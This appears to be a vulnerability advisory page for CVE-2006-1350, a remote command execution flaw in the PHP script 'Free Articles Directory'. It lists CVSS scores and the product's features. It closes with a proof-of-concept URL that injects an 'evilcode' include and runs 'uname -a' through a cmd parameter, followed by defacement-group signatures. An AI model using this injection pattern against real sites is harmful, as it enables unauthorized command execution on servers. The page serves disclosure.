Free Articles Directory Remote Command Exucetion

2006.03.23

Credit: botan

Risk: Medium

Local: No

Remote: Yes

CVE: CVE-2006-1350

CWE: CWE-Other

CVSS Base Score: 7.5/10

Impact Subscore: 6.4/10

Exploitability Subscore: 10/10

Exploit range: Remote

Attack complexity: Low

Authentication: No required

Confidentiality impact: Partial

Integrity impact: Partial

Availability impact: Partial

Web Site : http://www.99articles.com
Script Demo Site : http://www.articlesone.com
General :
1. Support rssfeed (XML) to distribute articles for others website and blogs. It will make grow website popularity
2. Newsletter to be growing visitors
3. Membership system for writer participants submit their articles
4. Top Articles list, Top Authors list, Most Popular Articles list
5. Article categories
6. Search engine friendly. Php generate articles page as html, etc
Admin :
1. Webbased control panel
2. Categories management
3. Articles management --> You can approve articles from writer
4. Search members and articles
5. Static page editor
6. Re-brand your website, change logo and website name
7. Easy integrated with Google Adsense to earn money
8. Two leve user management. Create super admin to be handle overall and create admin to approve articles.
Vulnerable :
http://www.example.com/index.php?page=evilcode?&cmd=uname -a
Patriotic Hackers in the name of Botan
Kurdish Defacerz ruLez.
www.PatrioticHackers.com
irc.gigachat.net #kurdhack

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Free Articles Directory Remote Command Exucetion

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.